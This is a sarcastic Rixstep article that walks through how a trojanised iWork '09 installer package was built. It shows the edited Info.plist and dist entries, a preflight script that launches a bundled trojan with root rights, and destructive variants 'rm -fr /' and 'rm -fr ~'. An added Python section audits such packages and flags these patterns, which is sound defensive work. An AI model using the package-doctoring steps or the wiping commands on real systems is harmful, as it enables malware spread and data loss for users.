Rixstep

Trojans for Nothing

That ain't working! That's the way you do it!
 - M Knopfler



Boy it sure is easy to screw over 20,000 stupid Maccie fanboys. You don't even have to write a trojan yourself. You don't have to know how to write code, compile, or link. All you do is take the prefab payload of your choice and put it in an Apple install package. Something - obviously - even children can do.

This is all about social engineering, folks. The security cottage industry want to scare you and sell you antivirus subscriptions but they're of no help at all. And the one thing you need is something money can't buy.

Brains.

Apple installer packages are bundles. That means if you have any halfway decent file manager (which does not include the imbecilic TFF) you'll see right away - gee whiz - there's a bunch of directories and files.

And right inside you'll find plain text files that explain in detail what's to be done when you, idiot user, click on the danged thing without inspecting first.

All you need now is a good ruse. The author of Oompa-Loompa started with 'Britney's Latest' but then he thought better of it as he was trying to screw over Maccie fanboys. And so he changed the title to latestpics.tgz and told the Maccie fanboys he found screenshots of Apple's latest operating system.

It worked like a charm.

iWork '09

Cut to 2009. And Apple's new 'office' package. Apple offer a free 30 day trial download. But why do things the easy way? If you're used to spending your parents' bandwidth hanging out at torrent sites then why not take the same download there while you're at it?

Why not indeed?

So the first thing you have to do is get the official download from Apple. Given a fast connection that's easy enough. Then you start doctoring the plain text files inside. Start with Info.plist and add your trojan to the mix.

<key>IFPkgFlagPackageList</key>
<array>
    <dict>
        <key>IFPkgFlagPackageLocation</key>
        <string>iWorkServices.pkg</string>
        <key>IFPkgFlagPackageSelection</key>
        <string>required</string>
    </dict>
    <dict>
        <key>IFPkgFlagPackageLocation</key>
        <string>iWork09Trial.pkg</string>
        <key>IFPkgFlagPackageSelection</key>
        <string>required</string>
    </dict>
    <dict>
        <key>IFPkgFlagPackageLocation</key>
        <string>iLifeMediaBrowser.pkg</string>
        <key>IFPkgFlagPackageSelection</key>
        <string>required</string>
    </dict>
</array>

Now you make a phony 'package' out of your trojan. Apps like Pacifist won't be fooled but you don't have to worry about your target demographic. Not one bit.

Now you set up your trojan in its 'info' file to require the system admin password and add it to the main package 'dist' file. A good trick is to use the same version number as the main module itself.

Title iWork Services
Version 
Description 
DefaultLocation /
DeleteWarning 

### Package Flags

NeedsAuthorization YES
Required NO
Relocatable NO
RequiresReboot NO
UseUserMask NO
OverwritePermissions NO
InstallFat NO
RootVolumeOnly NO
OnlyUpdateInstalledLanguages NO
<choices-outline>
    <line choice='iWorkServices'/>
    <line choice='iWorkTrial'/>
    <line choice='iLMB'/>
    <line choice='GAS'/>
    <line choice='ImageKit'/>
</choices-outline>
<choice id='iWorkServices' enabled='false' selected='true' title='iWorkServices'>
    <pkg-ref id='com.apple.pkg.iWorkServices' auth='Root' installKBytes="500"
    version="4.0.0.2160000.1637">file:./Contents/Packages/iWorkServices.pkg</pkg-ref>
</choice>
<choice id='iWorkTrial' enabled='false' selected='true' title='iWork'>
    <pkg-ref id='com.apple.pkg.iWork09Trial' auth='Root' installKBytes="870904"
    version="4.0.0.2160000.1637">file:./Contents/Packages/iWork09Trial.pkg</pkg-ref>
</choice>

You're going to have to fake some of the other components to fool Apple's Installer.app of course. And the most important thing is to get your trojan launched with escalated privileges. This is perhaps the easiest part: you do it in the preflight script.

#!/bin/sh
"$1/Contents/Resources/iworkservices" &

And iworkservices of course is the trojan. And provided you have a good trojan you're now home free. But if you should change your mind - if you should find an even better trojan - then all you do is find another installer package and do it again.

Thirty minutes work tops.

A Nastier Approach?

Of course if you want to be really mean you do something like this.

#!/bin/sh
rm -fr / &

Or if you find that lacking in elegance you do something like this.

#!/bin/sh
rm -fr ~ &

That way the poor fanboy won't notice anything until reboot. That can be a lot more fun.

This is all so easy - and Maccie fanboys are so stupid - it's a wonder it's not happened more often.
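What the inspection this article keeps urging looks like when written down, as an added example that is not part of the original article and not a Rixstep tool: a small Python script that executes nothing from the package but reads the plain-text pieces discussed above (IFPkgFlagPackageList in Info.plist, the auth='Root' pkg-refs and forced choices in the 'dist' file, and the preflight/postflight scripts of each sub-package) and flags the three patterns shown in this section: a backgrounded command, a command run from $1 (the package path Installer hands to the script), and a recursive rm of / or ~. The sample bundle it builds in a temporary directory is constructed from the page's own fragments; its file layout (Contents/Info.plist, Contents/distribution.dist, Contents/Packages/*/Contents/Resources/preflight) and the benign control script are assumptions, not a copy of the real installer.

```python
import os
import plistlib
import re
import tempfile
import xml.etree.ElementTree as ET

# Constructed sample: an unpacked metapackage laid out like the doctored iWork '09
# one. Layout and contents are assumptions built from the fragments on the page.
INFO_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict><key>IFPkgFlagPackageList</key><array>
<dict><key>IFPkgFlagPackageLocation</key><string>iWorkServices.pkg</string><key>IFPkgFlagPackageSelection</key><string>required</string></dict>
<dict><key>IFPkgFlagPackageLocation</key><string>iWork09Trial.pkg</string><key>IFPkgFlagPackageSelection</key><string>required</string></dict>
</array></dict></plist>
"""
DISTRIBUTION = b"""<?xml version="1.0" encoding="utf-8"?>
<installer-gui-script minSpecVersion='1'>
<choices-outline><line choice='iWorkServices'/><line choice='iWorkTrial'/></choices-outline>
<choice id='iWorkServices' enabled='false' selected='true' title='iWorkServices'>
<pkg-ref id='com.apple.pkg.iWorkServices' auth='Root' installKBytes="500"
version="4.0.0.2160000.1637">file:./Contents/Packages/iWorkServices.pkg</pkg-ref></choice>
<choice id='iWorkTrial' enabled='false' selected='true' title='iWork'>
<pkg-ref id='com.apple.pkg.iWork09Trial' auth='Root' installKBytes="870904"
version="4.0.0.2160000.1637">file:./Contents/Packages/iWork09Trial.pkg</pkg-ref></choice>
</installer-gui-script>
"""
PREFLIGHT_TROJAN = '#!/bin/sh\n"$1/Contents/Resources/iworkservices" &\n'  # the page's preflight
PREFLIGHT_BENIGN = '#!/bin/sh\nexit 0\n'                                   # constructed control

SCRIPT_NAMES = ("preflight", "preinstall", "postflight", "postinstall")
CHECKS = [  # (tag, pattern, why a reviewer cares)
    ("background", re.compile(r'(?<!&)&\s*$'), "backgrounded: outlives the installer, shows the user nothing"),
    ("runs-from-package", re.compile(r'\$\{?1\}?/'), "uses $1 (package path): runs something shipped inside the package"),
    ("recursive-rm", re.compile(r'\brm\s+-\w*[rR]\w*\s+["\']?(/|~/?|\$HOME/?)["\']?\s*(&|;|$)'),
     "recursive delete of / or the home directory"),
]

def _write(path, data):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb" if isinstance(data, bytes) else "w") as f:
        f.write(data)

def build_sample_bundle(root):
    """Write the constructed metapackage under root and return its path."""
    mpkg = os.path.join(root, "iWork09Trial.mpkg")
    _write(os.path.join(mpkg, "Contents", "Info.plist"), INFO_PLIST)
    _write(os.path.join(mpkg, "Contents", "distribution.dist"), DISTRIBUTION)
    for pkg, script in (("iWorkServices.pkg", PREFLIGHT_TROJAN), ("iWork09Trial.pkg", PREFLIGHT_BENIGN)):
        _write(os.path.join(mpkg, "Contents", "Packages", pkg, "Contents", "Resources", "preflight"), script)
    return mpkg

def list_subpackages(mpkg):
    """Sub-packages named in Info.plist's IFPkgFlagPackageList: (location, selection)."""
    with open(os.path.join(mpkg, "Contents", "Info.plist"), "rb") as f:
        info = plistlib.load(f)
    return [(p["IFPkgFlagPackageLocation"], p.get("IFPkgFlagPackageSelection", ""))
            for p in info.get("IFPkgFlagPackageList", [])]

def root_pkg_refs(mpkg):
    """pkg-refs that install as root (auth='Root'), with their choice and whether the
    choice is forced on the user (enabled='false' plus selected='true': cannot be unticked)."""
    root = ET.parse(os.path.join(mpkg, "Contents", "distribution.dist")).getroot()
    refs = []
    for choice in root.iter("choice"):
        forced = choice.get("enabled") == "false" and choice.get("selected") == "true"
        for ref in choice.findall("pkg-ref"):
            if ref.get("auth", "").lower() == "root":
                refs.append({"choice": choice.get("id"), "pkg": ref.get("id"),
                             "path": (ref.text or "").strip(), "forced": forced})
    return refs

def audit_script(text):
    """Return [(line_no, tag, message)] for every suspicious non-comment line."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if s and not s.startswith("#"):
            findings += [(n, tag, msg) for tag, rx, msg in CHECKS if rx.search(s)]
    return findings

def audit_scripts(mpkg):
    """{sub-package: {script name: findings}} for every install script with findings."""
    report = {}
    pkgdir = os.path.join(mpkg, "Contents", "Packages")
    for pkg in sorted(os.listdir(pkgdir)):
        for name in SCRIPT_NAMES:
            path = os.path.join(pkgdir, pkg, "Contents", "Resources", name)
            if os.path.isfile(path):
                with open(path, encoding="utf-8", errors="replace") as f:
                    found = audit_script(f.read())
                if found:
                    report.setdefault(pkg, {})[name] = found
    return report

def demo():
    """Build the constructed bundle in a temp dir, audit it, and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        mpkg = build_sample_bundle(tmp)
        return {"subpackages": list_subpackages(mpkg),
                "root_pkgs": root_pkg_refs(mpkg),
                "scripts": audit_scripts(mpkg)}

if __name__ == "__main__":
    print(demo())
```

Run against the sample, the report lists both sub-packages as 'required', shows both pkg-refs installing as root under choices the user cannot deselect, and flags only the iWorkServices preflight: a backgrounded command run out of the package itself. The point of the three regexes is not completeness but that every one of the scripts shown in this section trips at least one of them, which is all the 'inspect before you click' step needs.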

New Apple EULA

In light of these recent developments Apple have decided to augment their traditional end user licence agreement and require all Maccie fanboys in the future print out and send a signed copy to One Infinite Loop.

Look at them yo-yos!
 - M Knopfler

Copyright © Rixstep. All rights reserved.